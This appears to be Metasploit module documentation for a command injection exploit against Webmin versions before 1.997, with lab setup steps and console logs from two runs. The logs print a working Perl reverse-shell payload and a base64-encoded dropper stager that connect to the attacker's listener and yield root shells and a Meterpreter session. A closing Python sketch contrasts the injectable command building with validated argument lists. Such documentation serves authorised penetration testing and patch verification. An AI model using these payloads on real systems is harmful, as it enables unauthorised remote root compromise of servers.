## Vulnerable Application

This module exploits an arbitrary command injection in Webmin versions prior to 1.997.

Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call.

This exploit requires authentication and the account must have access to the Software Package Updates module.

## Installation

### Ubuntu

- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
- Install it along with its dependencies (`libio-pty-perl` is required when installing on Ubuntu 20.04)

```
apt-get install libauthen-pam-perl libio-pty-perl
dpkg -i ./webmin_1.996_all.deb
```

## Setup

- Go to `https://:10000/`
- Log in as `root` with the OS password
- Create a new user: `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
- Set up permissions: `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`

## Verification Steps

1. Install and set up the application
1. Start msfconsole
1. Do: `use exploit/linux/http/webmin_package_updates_rce`
1. Do: `run lhost= rhosts= username= password=`
1. You should get a shell.

## Options

### TARGETURI

Set this to the Webmin base path. The default is `/`.

### USERNAME

The account username to use.

### PASSWORD

The account password.

## Scenarios

### Webmin 1.996 on Ubuntu 18.04

- Target 0 (`Unix In-Memory`)

```
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200

id
uid=0(root) gid=0(root) groups=0(root)
cat /etc/issue
Ubuntu 18.04.6 LTS \n \l
```

- Target 1 (`Linux Dropper`)

```
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.0.23
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```
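
The injection described under "Vulnerable Application" arises when request values are concatenated into the package manager command line. The sketch below is an added example, not Webmin's or this module's code: it contrasts that pattern with validating each name and passing an argv list that no shell parses. The function names, the Debian-policy name pattern and the sample inputs are assumptions constructed for illustration.

```python
import re
import shlex

# Assumption: Debian policy naming (lowercase alphanumerics plus '+', '-', '.',
# two or more characters, starting with an alphanumeric). RPM-based systems
# would need a different pattern.
PKG_NAME = re.compile(r"[a-z0-9][a-z0-9+.\-]+")


def build_shell_string(packages):
    """Vulnerable pattern: request values concatenated into one shell command line."""
    return "apt-get -y install " + " ".join(packages)


def build_argv(packages):
    """Hardened pattern: validate every name, then return an argv list."""
    bad = [p for p in packages if not PKG_NAME.fullmatch(p)]
    if not packages or bad:
        raise ValueError(f"rejected package list: {bad!r}")
    # '--' ends option parsing, so no name can be read as an apt-get option.
    # Run the result with subprocess.run(argv, shell=False): no shell parses it.
    return ["apt-get", "-y", "install", "--", *packages]


def shell_words(command):
    """Split like a POSIX shell, keeping control operators (';', '|', '&&') as tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


if __name__ == "__main__":
    # Constructed sample input: the second "package name" carries a shell operator.
    requested = ["curl", "nano; echo INJECTED"]
    print(shell_words(build_shell_string(requested)))
    try:
        build_argv(requested)
    except ValueError as exc:
        print(exc)
    print(build_argv(["curl", "libio-pty-perl"]))
```

A `;` token in the `shell_words` output marks the point where the shell would start a second command; `build_argv` rejects the same input before any process is started.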